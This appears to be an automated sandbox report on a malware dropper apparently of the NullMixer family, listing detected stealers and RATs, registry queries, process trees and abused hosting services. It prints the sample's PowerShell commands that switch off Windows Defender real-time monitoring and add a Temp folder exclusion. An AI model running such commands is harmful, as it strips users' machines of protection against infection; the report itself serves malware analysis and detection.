memory/2628-208-0x00000000028E0000-0x0000000002972000-memory.dmp

memory/2628-209-0x0000000002410000-0x00000000025A7000-memory.dmp

memory/2284-233-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2284-232-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2284-231-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2284-230-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2284-228-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2284-226-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2284-224-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2100-221-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2100-220-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2100-219-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2100-218-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2100-216-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2100-214-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2100-212-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2100-210-0x0000000000400000-0x0000000000422000-memory.dmp

memory/932-246-0x0000000000400000-0x0000000000422000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-23 20:56

Reported

2024-11-23 20:58

Platform

win10v2004-20241007-en

Max time kernel

74s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-VQR7K.tmp\Wed228eebd341673e072.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22168eb266d7a.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22d8c4cdc4a5a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22269ff37e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2235e1e9c9640.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VQR7K.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22add6199f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed224fff3f809a1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed227d9e0c1976ea6dc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22168eb266d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed220fb9dde4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22988be99e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2255741b48dffd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22293324c9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22ac1480b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JO1SS.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22add6199f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2255741b48dffd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22ac1480b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22ac1480b8.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed224fff3f809a1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-JO1SS.tmp\Wed228eebd341673e072.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22ac1480b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2255741b48dffd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-VQR7K.tmp\Wed228eebd341673e072.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22add6199f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22988be99e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22269ff37e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22add6199f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22ac1480b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed220fb9dde4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22168eb266d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2235e1e9c9640.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2255741b48dffd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22d8c4cdc4a5a.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22988be99e.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22988be99e.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22988be99e.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2235e1e9c9640.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed227d9e0c1976ea6dc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed224fff3f809a1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3148 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe
PID 3148 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe
PID 3148 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe
PID 3824 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2996 wrote to memory of 556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2996 wrote to memory of 556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3076 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3076 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3076 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3824 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3824 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2720 wrote to memory of 1852 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22d8c4cdc4a5a.exe
PID 2720 wrote to memory of 1852 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22d8c4cdc4a5a.exe
PID 2720 wrote to memory of 1852 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22d8c4cdc4a5a.exe
PID 3644 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe
PID 3644 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe
PID 3644 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe
PID 3676 wrote to memory of 2340 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22269ff37e.exe
PID 3676 wrote to memory of 2340 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22269ff37e.exe
PID 3676 wrote to memory of 2340 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22269ff37e.exe
PID 3292 wrote to memory of 4488 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2235e1e9c9640.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed2255741b48dffd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22d8c4cdc4a5a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22168eb266d7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed220fb9dde4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22add6199f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22988be99e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22ac1480b8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed2235e1e9c9640.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22293324c9c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed224fff3f809a1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed228eebd341673e072.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22269ff37e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed227d9e0c1976ea6dc.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22d8c4cdc4a5a.exe

Wed22d8c4cdc4a5a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe

Wed228eebd341673e072.exe

C:\Users\Admin\AppData\Local\Temp\is-VQR7K.tmp\Wed228eebd341673e072.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VQR7K.tmp\Wed228eebd341673e072.tmp" /SL5="$501CA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22269ff37e.exe

Wed22269ff37e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2235e1e9c9640.exe

Wed2235e1e9c9640.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed224fff3f809a1.exe

Wed224fff3f809a1.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22168eb266d7a.exe

Wed22168eb266d7a.exe

